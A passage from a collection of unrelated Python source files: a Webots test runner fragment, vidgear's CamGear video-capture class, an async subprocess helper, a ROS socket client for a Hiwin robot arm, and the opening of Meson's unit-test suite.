if self.mainProcess and self.mainThread.is_alive():
self.terminate(force=False)
exit()
def runTest(self, timeout=None, silent=True, forceTermination=True,
shell=False):
"""Run the command and redirect the STDERR and STDOUT to files."""
def mainTarget():
outFile = open(self.outFileName, "w")
errFile = open(self.errFileName, "w")
self.returncode = subprocess.call(self.cmd, shell=shell, bufsize=1,
universal_newlines=True, stdout=outFile, stderr=errFile)
outFile.close()
errFile.close()
self.outFileName = os.environ['WEBOTS_HOME'] + os.sep + 'tests' + os.sep + 'webots_stdout.txt'
self.errFileName = os.environ['WEBOTS_HOME'] + os.sep + 'tests' + os.sep + 'webots_stderr.txt'
self.resetAttributes()
self.silent = silent
self.timeout = timeout
self.isRunningFlag = True
try:
self.mainThread = threading.Thread(target=mainTarget)
self.mainThread.start()
self.mainThread.join(timeout)
self.isRunningFlag = False
if self.mainProcess and self.mainThread.is_alive(): # timeout case
self.isTimeout = True
if forceTermination:
self.stopMainProcess()
except (KeyboardInterrupt, SystemExit):
self.isRunningFlag = False
if self.mainProcess and self.mainThread.is_alive():
self.terminate(force=False)
exit()
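# A minimal usage sketch (not part of the original test harness; the echoed string is illustrative):
if __name__ == '__main__':
    command = Command('echo hello')          # wrap a simple system command
    command.run(timeout=10, silent=False)    # run it, mirroring its output to stdout
    print('return code:', command.returncode)
    print('captured output:', command.output)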
|
camgear.py
|
"""
===============================================
vidgear library source-code is deployed under the Apache 2.0 License:
Copyright (c) 2019-2020 Abhishek Thakur(@abhiTronix) <[email protected]>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
===============================================
"""
# import the necessary packages
import cv2
import time
import logging as log
from threading import Thread
from pkg_resources import parse_version
from .helper import capPropId, logger_handler, check_CV_version, youtube_url_validator
# define logger
logger = log.getLogger("CamGear")
logger.propagate = False
logger.addHandler(logger_handler())
logger.setLevel(log.DEBUG)
class CamGear:
"""
    CamGear API supports a diverse range of video streams: it can handle/control almost any IP/USB camera, multimedia video file format
    (_up to 4k tested_), and any network stream URL such as *http(s), rtp, rtsp, rtmp, mms, etc.* In addition to this, it also supports live GStreamer RAW pipelines
    and YouTube video/livestream URLs.
CamGear API provides a flexible, high-level multi-threaded wrapper around [**OpenCV's VideoCapture Class**](https://docs.opencv.org/3.4/d8/dfe/classcv_1_1VideoCapture.html) with direct access to almost all of its available parameters,
and also internally employs `pafy` with `youtube-dl` backend for enabling seamless live *YouTube streaming*.
CamGear relies exclusively on **Threaded Queue mode** for threaded, error-free and synchronized frame handling.
"""
def __init__(
self,
source=0,
y_tube=False,
backend=0,
colorspace=None,
logging=False,
time_delay=0,
**options
):
# enable logging if specified
self.__logging = False
if logging:
self.__logging = logging
# check if Youtube Mode is ON (True)
if y_tube:
try:
# import pafy and parse youtube stream url
import pafy
# validate
video_url = youtube_url_validator(source)
if video_url:
source_object = pafy.new(video_url)
vo_source = source_object.getbestvideo("webm", ftypestrict=True)
va_source = source_object.getbest("webm", ftypestrict=False)
# select the best quality
if vo_source is None or (
va_source.dimensions >= vo_source.dimensions
):
source = va_source.url
else:
source = vo_source.url
if self.__logging:
logger.debug(
"YouTube source ID: `{}`, Title: `{}`".format(
video_url, source_object.title
)
)
else:
raise RuntimeError(
"Invalid `{}` Youtube URL cannot be processed!".format(source)
)
except Exception as e:
if self.__logging:
logger.exception(str(e))
raise ValueError(
"[CamGear:ERROR] :: YouTube Mode is enabled and the input YouTube URL is incorrect!"
)
# youtube mode variable initialization
self.__youtube_mode = y_tube
# assigns special parameter to global variable and clear
self.__threaded_queue_mode = options.pop("THREADED_QUEUE_MODE", True)
if not isinstance(self.__threaded_queue_mode, bool):
# reset improper values
self.__threaded_queue_mode = True
self.__queue = None
# initialize deque for video files only
if self.__threaded_queue_mode and isinstance(source, str):
# import deque
from collections import deque
# define deque and assign it to global var
self.__queue = deque(maxlen=96) # max len 96 to check overflow
# log it
if self.__logging:
logger.debug(
"Enabling Threaded Queue Mode for the current video source!"
)
else:
# otherwise disable it
self.__threaded_queue_mode = False
# log it
if self.__logging:
logger.warning(
"Threaded Queue Mode is disabled for the current video source!"
)
# stream variable initialization
self.stream = None
if backend and isinstance(backend, int):
# add backend if specified and initialize the camera stream
if check_CV_version() == 3:
# Different OpenCV 3.4.x statement
self.stream = cv2.VideoCapture(source + backend)
else:
# Two parameters are available since OpenCV 4+ (master branch)
self.stream = cv2.VideoCapture(source, backend)
logger.debug("Setting backend `{}` for this source.".format(backend))
else:
# initialize the camera stream
self.stream = cv2.VideoCapture(source)
# initializing colorspace variable
self.color_space = None
# apply attributes to source if specified
options = {str(k).strip(): v for k, v in options.items()}
for key, value in options.items():
property = capPropId(key)
if not (property is None):
self.stream.set(property, value)
# handle colorspace value
if not (colorspace is None):
self.color_space = capPropId(colorspace.strip())
if self.__logging and not (self.color_space is None):
logger.debug(
"Enabling `{}` colorspace for this video stream!".format(
colorspace.strip()
)
)
# initialize and assign frame-rate variable
self.framerate = 0.0
_fps = self.stream.get(cv2.CAP_PROP_FPS)
if _fps > 1.0:
self.framerate = _fps
# applying time delay to warm-up webcam only if specified
if time_delay:
time.sleep(time_delay)
# frame variable initialization
(grabbed, self.frame) = self.stream.read()
# check if valid stream
if grabbed:
# render colorspace if defined
if not (self.color_space is None):
self.frame = cv2.cvtColor(self.frame, self.color_space)
if self.__threaded_queue_mode:
# initialize and append to queue
self.__queue.append(self.frame)
else:
raise RuntimeError(
"[CamGear:ERROR] :: Source is invalid, CamGear failed to intitialize stream on this source!"
)
# thread initialization
self.__thread = None
# initialize termination flag
self.__terminate = False
def start(self):
"""
Launches the internal *Threaded Frames Extractor* daemon
**Returns:** A reference to the CamGear class object.
"""
self.__thread = Thread(target=self.__update, name="CamGear", args=())
self.__thread.daemon = True
self.__thread.start()
return self
def __update(self):
"""
        A **Threaded Frames Extractor** that keeps iterating frames from OpenCV's VideoCapture API into an internal monitored deque,
        until the thread is terminated or the frames run out.
"""
        # keep iterating until the thread is terminated or the frames run out
while True:
# if the thread indicator variable is set, stop the thread
if self.__terminate:
break
if self.__threaded_queue_mode:
# check queue buffer for overflow
if len(self.__queue) >= 96:
# stop iterating if overflowing occurs
time.sleep(0.000001)
continue
# otherwise, read the next frame from the stream
(grabbed, frame) = self.stream.read()
# check for valid frames
if not grabbed:
# no frames received, then safely exit
if self.__threaded_queue_mode:
if len(self.__queue) == 0:
break
else:
continue
else:
break
if not (self.color_space is None):
# apply colorspace to frames
color_frame = None
try:
if isinstance(self.color_space, int):
color_frame = cv2.cvtColor(frame, self.color_space)
else:
if self.__logging:
logger.warning(
"Global color_space parameter value `{}` is not a valid!".format(
self.color_space
)
)
self.color_space = None
except Exception as e:
# Catch if any error occurred
self.color_space = None
if self.__logging:
logger.exception(str(e))
logger.warning("Input colorspace is not a valid colorspace!")
if not (color_frame is None):
self.frame = color_frame
else:
self.frame = frame
else:
self.frame = frame
# append to queue
if self.__threaded_queue_mode:
self.__queue.append(self.frame)
self.__threaded_queue_mode = False
self.frame = None
# release resources
self.stream.release()
def read(self):
"""
        Extracts frames synchronously from the monitored deque, while maintaining a fixed-length frame buffer in memory,
        and blocks the thread if the deque is full.
        **Returns:** An n-dimensional numpy array.
"""
while self.__threaded_queue_mode:
if len(self.__queue) > 0:
return self.__queue.popleft()
return self.frame
def stop(self):
"""
Safely terminates the thread, and release the VideoStream resources.
"""
if self.__logging:
logger.debug("Terminating processes.")
# terminate Threaded queue mode separately
if self.__threaded_queue_mode and not (self.__queue is None):
if len(self.__queue) > 0:
self.__queue.clear()
self.__threaded_queue_mode = False
self.frame = None
        # indicate that the thread should be terminated
self.__terminate = True
# wait until stream resources are released (producer thread might be still grabbing frame)
if self.__thread is not None:
self.__thread.join()
# properly handle thread exit
if self.__youtube_mode:
# kill thread-lock in youtube mode
self.__thread = None
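# A minimal usage sketch (illustrative; assumes a local webcam at index 0 that OpenCV can open):
#
#   stream = CamGear(source=0, logging=True).start()   # open the source and start the frame-extractor thread
#   while True:
#       frame = stream.read()        # latest frame (or None once the stream ends)
#       if frame is None:
#           break
#       cv2.imshow("CamGear demo", frame)
#       if cv2.waitKey(1) & 0xFF == ord("q"):
#           break
#   cv2.destroyAllWindows()
#   stream.stop()                    # safely terminate the thread and release the capture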
|
async_command.py
|
import os
import sys
import time
from subprocess import PIPE, Popen
from threading import Thread
from queue import Queue, Empty
ON_POSIX = 'posix' in sys.builtin_module_names
[PENDING, RUNNING, STOPPED] = range(3) # Command state enum
class AsyncCommand:
# Assign a command that will be run in a separate thread
def __init__(self, command, executeNow=True):
self.command = command.split()
self.state = STOPPED
self.result = ""
self.proc = None
self.queue = None
self.cmdThread = None
# Open the null device for dumping unwanted output into.
self.devnull = open(os.devnull, 'w')
if executeNow:
self.run()
# Start the command running in a thread
def run(self):
if self.state == STOPPED:
self.state = PENDING
self.result = "" # Reset
self.proc = Popen(self.command, stdout=PIPE, stderr=self.devnull, close_fds=ON_POSIX)
self.queue = Queue()
self.cmdThread = Thread(target=self._enqueueOutput, args=(self.proc.stdout, self.queue))
self.cmdThread.daemon = True # thread dies with the program
self.cmdThread.start()
# TODO: Why is the loop here? This makes the asyncCommand a blocking command...
while self.state != STOPPED:
try:
line = self.queue.get_nowait()
except Empty:
if self.state == RUNNING:
self.state = STOPPED
else:
time.sleep(0.1)
else: # got line
if self.state == PENDING:
self.state = RUNNING
self.result += line.decode('utf-8')
#
def _runThread(self):
pass
# Worker thread function for fetching lines of command output
def _enqueueOutput(self, out, queue):
for line in iter(out.readline, b''):
queue.put(line)
out.close()
def isStopped(self):
return self.state == STOPPED
def getResult(self):
return self.result
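# A minimal usage sketch (not part of the original module; 'ls -l' is an illustrative POSIX command):
if __name__ == '__main__':
    cmd = AsyncCommand('ls -l')        # executeNow=True by default, so the command runs immediately
    while not cmd.isStopped():         # run() currently drains all output before returning, so this is instant
        time.sleep(0.1)
    print(cmd.getResult())             # accumulated stdout of the command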
|
Hiwin_RT605_ArmCommand_Socket_20190627174537.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
## multithreading
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
Socket = 0
data = '0'  # initial value of the transmitted data
Arm_feedback = 1  # assume the arm is busy
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
        return  # PEP 479: raising StopIteration inside a generator is a RuntimeError in Python 3.7+
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
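# Usage sketch for the switch() helper above (values are illustrative):
#   for case in switch(mode):
#       if case(Taskcmd.Action_Type.PtoP):
#           ...handle point-to-point motion...
#           break
#       if case():          # default branch: case() with no arguments always matches
#           ...handle anything else...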
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
def point_data(x,y,z,pitch,roll,yaw):  ## receive the pose data sent by the strategy side
pos.x = '%s'%x
pos.y = '%s'%y
pos.z = '%s'%z
pos.pitch = '%s'%pitch
pos.roll = '%s'%roll
pos.yaw = '%s'%yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth):  ## receive the arm-mode data sent by the strategy side
global arm_mode_flag
socket_cmd.action = int('%s'%action)
socket_cmd.grip = int('%s'%grip)
socket_cmd.ra = int('%s'%ra)
socket_cmd.setvel = int('%s'%setvel)
socket_cmd.setboth = int('%s'%setboth)
arm_mode_flag = True
print("sssss:",socket_cmd.action)
#Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode):  ## receive the speed-mode data sent by the strategy side
global speed_mode_flag
socket_cmd.Speedmode = speedmode
# def Grip_Mode(req):  ## receive the gripper action data sent by the strategy side
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_talker():  ## create the server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
# rospy.loginfo(state)
pub.publish(state)
rate.sleep()
# a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
# s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
# b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
#print ("Ready to connect")
#rospy.spin() ## spin one
##------------ server side end -------
##---------- socket packet transmission ----------##
##--------------- send arm commands over the socket -----------------
def Socket_command():
global Socket,arm_mode_flag
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
            #------- set arm speed --------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
            #------- set arm delay time --------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
            #------- set arm fast/safe speed mode --------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
        socket_cmd.action = 5 ## reset to the initial mode state
        #print(data)
        Socket.send(data.encode('utf-8')) # encode the command string and send it over the socket
# Socket_sent_flag = True
# socket_client_sent_flag(Socket_sent_flag)
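# Illustrative call sequence (added; not part of the original script): the strategy
# side is expected to set the target pose and the arm mode first, then let
# Socket_command() encode and send the packet. The numeric values are placeholders.
def _send_ptp_example():
    point_data(0.0, 36.8, 11.35, -90.0, 0.0, 0.0) # target pose
    Arm_Mode(Taskcmd.Action_Type.PtoP, 0, Taskcmd.RA.ABS, 10, Taskcmd.Ctrl_Mode.CTRL_BOTH)
    Socket_command() # builds the command string and sends it through the connected socket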
##-----------socket client--------
def socket_client():
global Socket
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(Socket.recv(1024))
while 1:
feedback_str = Socket.recv(1024)
        # the arm side reports its current state
        if str(feedback_str[2]) == '48': # 0/F: arm is Ready and can accept the next motion command
state_feedback.ArmState = 0
# Arm_feedback = 0
# socket_client_arm_state(Arm_feedback)
#print("isbusy false")
        if str(feedback_str[2]) == '49': # 1/T: arm is busy and cannot execute the next motion command
state_feedback.ArmState = 1
# Arm_feedback = 1
# socket_client_arm_state(Arm_feedback)
#print("isbusy true")
        if str(feedback_str[2]) == '54': # 6: strategy finished
state_feedback.ArmState = 6
# Arm_feedback = 6
# socket_client_arm_state(Arm_feedback)
print("shutdown")
        # check the sent flag
        if str(feedback_str[4]) == '48': # returned 0: false
state_feedback.SentFlag = 0
# Socket_sent_flag = False
# socket_client_sent_flag(Socket_sent_flag)
        if str(feedback_str[4]) == '49': # returned 1: true
state_feedback.SentFlag = 1
# Socket_sent_flag = True
# socket_client_sent_flag(Socket_sent_flag)
        ##--------------- send arm commands over the socket: end -----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
break
rospy.on_shutdown(myhook)
Socket.close()
##-----------socket client end--------
##------------- socket packet transmission end --------------##
## multithreading
def thread_test():
socket_client()
## multithreading end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
    socket_cmd.action = 5 ## set the initial mode state
t = threading.Thread(target=thread_test)
    t.start() # start the socket client thread
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
|
run_unittests.py
|
#!/usr/bin/env python3
# Copyright 2016-2017 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import stat
import subprocess
import re
import json
import tempfile
import textwrap
import os
import shutil
import sys
import unittest
import platform
import pickle
import functools
import io
import operator
import threading
import urllib.error
import urllib.request
import zipfile
import hashlib
from itertools import chain
from unittest import mock
from configparser import ConfigParser
from contextlib import contextmanager
from glob import glob
from mesonbuild._pathlib import (PurePath, Path)
from distutils.dir_util import copy_tree
import typing as T
import mesonbuild.mlog
import mesonbuild.depfile
import mesonbuild.dependencies.base
import mesonbuild.compilers
import mesonbuild.envconfig
import mesonbuild.environment
import mesonbuild.mesonlib
import mesonbuild.coredata
import mesonbuild.linkers
import mesonbuild.modules.gnome
from mesonbuild.interpreter import Interpreter, ObjectHolder
from mesonbuild.ast import AstInterpreter
from mesonbuild.mesonlib import (
BuildDirLock, LibType, MachineChoice, PerMachine, Version, is_windows,
is_osx, is_cygwin, is_dragonflybsd, is_openbsd, is_haiku, is_sunos,
windows_proof_rmtree, python_command, version_compare, split_args,
quote_arg, relpath, is_linux, git, GIT
)
from mesonbuild.environment import detect_ninja
from mesonbuild.mesonlib import MesonException, EnvironmentException
from mesonbuild.dependencies import PkgConfigDependency, ExternalProgram
import mesonbuild.dependencies.base
from mesonbuild.build import Target, ConfigurationData
import mesonbuild.modules.pkgconfig
from mesonbuild.mtest import TAPParser, TestResult
from mesonbuild.wrap.wrap import PackageDefinition, WrapException
from run_tests import (
Backend, FakeBuild, FakeCompilerOptions,
ensure_backend_detects_changes, exe_suffix, get_backend_commands,
get_builddir_target_args, get_fake_env, get_fake_options, get_meson_script,
run_configure_inprocess, run_mtest_inprocess
)
URLOPEN_TIMEOUT = 5
@contextmanager
def chdir(path: str):
curdir = os.getcwd()
os.chdir(path)
try:
yield
finally:
os.chdir(curdir)
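# Minimal usage sketch (added for illustration; not part of the original test suite):
# chdir() restores the previous working directory even if the body raises.
def _chdir_demo():
    with tempfile.TemporaryDirectory() as tmpdir:
        with chdir(tmpdir):
            assert Path.cwd() == Path(tmpdir).resolve()
        # back in the original working directory here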
def get_dynamic_section_entry(fname, entry):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF platforms')
try:
raw_out = subprocess.check_output(['readelf', '-d', fname],
universal_newlines=True)
except FileNotFoundError:
# FIXME: Try using depfixer.py:Elf() as a fallback
raise unittest.SkipTest('readelf not found')
pattern = re.compile(entry + r': \[(.*?)\]')
for line in raw_out.split('\n'):
m = pattern.search(line)
if m is not None:
return m.group(1)
return None # The file did not contain the specified entry.
def get_soname(fname):
return get_dynamic_section_entry(fname, 'soname')
def get_rpath(fname):
return get_dynamic_section_entry(fname, r'(?:rpath|runpath)')
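# Usage sketch (added for illustration; not part of the original file): these helpers
# shell out to readelf, so they only make sense on ELF platforms and for binaries that
# have already been built. The path below is a hypothetical placeholder.
def _elf_metadata_demo(built_shared_lib='builddir/libfoo.so'):
    return {'soname': get_soname(built_shared_lib),
            'rpath': get_rpath(built_shared_lib)}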
def is_tarball():
if not os.path.isdir('docs'):
return True
return False
def is_ci():
if 'CI' in os.environ:
return True
return False
def is_pull():
# Travis
if os.environ.get('TRAVIS_PULL_REQUEST', 'false') != 'false':
return True
# Azure
if 'SYSTEM_PULLREQUEST_ISFORK' in os.environ:
return True
return False
def _git_init(project_dir):
subprocess.check_call(['git', 'init'], cwd=project_dir, stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'config',
'user.name', 'Author Person'], cwd=project_dir)
subprocess.check_call(['git', 'config',
'user.email', '[email protected]'], cwd=project_dir)
subprocess.check_call('git add *', cwd=project_dir, shell=True,
stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'commit', '-a', '-m', 'I am a project'], cwd=project_dir,
stdout=subprocess.DEVNULL)
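# Usage sketch (added for illustration; not part of the original file): _git_init() is
# pointed at a directory that already contains project files and turns it into a
# one-commit git repository; it requires git on PATH when actually invoked.
def _git_init_demo():
    with tempfile.TemporaryDirectory() as project_dir:
        Path(project_dir, 'meson.build').write_text("project('demo', 'c')")
        _git_init(project_dir)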
@functools.lru_cache()
def is_real_gnu_compiler(path):
'''
Check if the gcc we have is a real gcc and not a macOS wrapper around clang
'''
if not path:
return False
out = subprocess.check_output([path, '--version'], universal_newlines=True, stderr=subprocess.STDOUT)
return 'Free Software Foundation' in out
def skipIfNoExecutable(exename):
'''
Skip this test if the given executable is not found.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if shutil.which(exename) is None:
raise unittest.SkipTest(exename + ' not found')
return func(*args, **kwargs)
return wrapped
return wrapper
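# Illustration (added; not part of the original file): the decorator above wraps any
# callable, not only TestCase methods. 'ninja' is just an example executable name.
@skipIfNoExecutable('ninja')
def _example_requires_ninja():
    return subprocess.check_output(['ninja', '--version'], universal_newlines=True)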
def skipIfNoPkgconfig(f):
'''
Skip this test if no pkg-config is found, unless we're on CI.
This allows users to run our test suite without having
pkg-config installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
Note: Yes, we provide pkg-config even while running Windows CI
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
return f(*args, **kwargs)
return wrapped
def skipIfNoPkgconfigDep(depname):
'''
Skip this test if the given pkg-config dep is not found, unless we're on CI.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
if not is_ci() and subprocess.call(['pkg-config', '--exists', depname]) != 0:
raise unittest.SkipTest('pkg-config dependency {} not found.'.format(depname))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_no_cmake(f):
'''
Skip this test if no cmake is found, unless we're on CI.
This allows users to run our test suite without having
cmake installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('cmake') is None:
raise unittest.SkipTest('cmake not found')
return f(*args, **kwargs)
return wrapped
def skip_if_not_language(lang):
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
try:
env = get_fake_env()
f = getattr(env, 'detect_{}_compiler'.format(lang))
f(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('No {} compiler found.'.format(lang))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_env_set(key):
'''
Skip a test if a particular env is set, except when running under CI
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
old = None
if key in os.environ:
if not is_ci():
raise unittest.SkipTest('Env var {!r} set, skipping'.format(key))
old = os.environ.pop(key)
try:
return func(*args, **kwargs)
finally:
if old is not None:
os.environ[key] = old
return wrapped
return wrapper
def skip_if_not_base_option(feature):
"""Skip tests if The compiler does not support a given base option.
for example, ICC doesn't currently support b_sanitize.
"""
def actual(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if feature not in cc.base_options:
raise unittest.SkipTest(
'{} not available with {}'.format(feature, cc.id))
return f(*args, **kwargs)
return wrapped
return actual
@contextmanager
def temp_filename():
'''A context manager which provides a filename to an empty temporary file.
On exit the file will be deleted.
'''
fd, filename = tempfile.mkstemp()
os.close(fd)
try:
yield filename
finally:
try:
os.remove(filename)
except OSError:
pass
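# Minimal usage sketch (added for illustration; not part of the original file):
# temp_filename() hands out a real path to an empty file and removes it afterwards.
def _temp_filename_demo():
    with temp_filename() as fname:
        with open(fname, 'w') as f:
            f.write('key = value\n')
        assert os.path.exists(fname)
    # the file has been deleted once the with-block exits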
@contextmanager
def no_pkgconfig():
'''
A context manager that overrides shutil.which and ExternalProgram to force
them to return None for pkg-config to simulate it not existing.
'''
old_which = shutil.which
old_search = ExternalProgram._search
def new_search(self, name, search_dir):
if name == 'pkg-config':
return [None]
return old_search(self, name, search_dir)
    def new_which(cmd, *args):
        if cmd == 'pkg-config':
            return None
        return old_which(cmd, *args)
shutil.which = new_which
ExternalProgram._search = new_search
try:
yield
finally:
shutil.which = old_which
ExternalProgram._search = old_search
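# Usage sketch (added for illustration; not part of the original file): inside the
# with-block both lookup paths report that pkg-config is missing, which lets tests
# exercise the "pkg-config not installed" code paths.
def _no_pkgconfig_demo():
    with no_pkgconfig():
        assert shutil.which('pkg-config') is None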
class InternalTests(unittest.TestCase):
def test_version_number(self):
searchfunc = mesonbuild.environment.search_version
self.assertEqual(searchfunc('foobar 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.128'), '2016.10.128')
self.assertEqual(searchfunc('2016.10.128'), '2016.10.128')
self.assertEqual(searchfunc('2016.10'), '2016.10')
self.assertEqual(searchfunc('2016.10 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('oops v1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.oops 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.x'), 'unknown version')
def test_mode_symbolic_to_bits(self):
modefunc = mesonbuild.mesonlib.FileMode.perms_s_to_bits
self.assertEqual(modefunc('---------'), 0)
self.assertEqual(modefunc('r--------'), stat.S_IRUSR)
self.assertEqual(modefunc('---r-----'), stat.S_IRGRP)
self.assertEqual(modefunc('------r--'), stat.S_IROTH)
self.assertEqual(modefunc('-w-------'), stat.S_IWUSR)
self.assertEqual(modefunc('----w----'), stat.S_IWGRP)
self.assertEqual(modefunc('-------w-'), stat.S_IWOTH)
self.assertEqual(modefunc('--x------'), stat.S_IXUSR)
self.assertEqual(modefunc('-----x---'), stat.S_IXGRP)
self.assertEqual(modefunc('--------x'), stat.S_IXOTH)
self.assertEqual(modefunc('--S------'), stat.S_ISUID)
self.assertEqual(modefunc('-----S---'), stat.S_ISGID)
self.assertEqual(modefunc('--------T'), stat.S_ISVTX)
self.assertEqual(modefunc('--s------'), stat.S_ISUID | stat.S_IXUSR)
self.assertEqual(modefunc('-----s---'), stat.S_ISGID | stat.S_IXGRP)
self.assertEqual(modefunc('--------t'), stat.S_ISVTX | stat.S_IXOTH)
self.assertEqual(modefunc('rwx------'), stat.S_IRWXU)
self.assertEqual(modefunc('---rwx---'), stat.S_IRWXG)
self.assertEqual(modefunc('------rwx'), stat.S_IRWXO)
# We could keep listing combinations exhaustively but that seems
# tedious and pointless. Just test a few more.
self.assertEqual(modefunc('rwxr-xr-x'),
stat.S_IRWXU |
stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
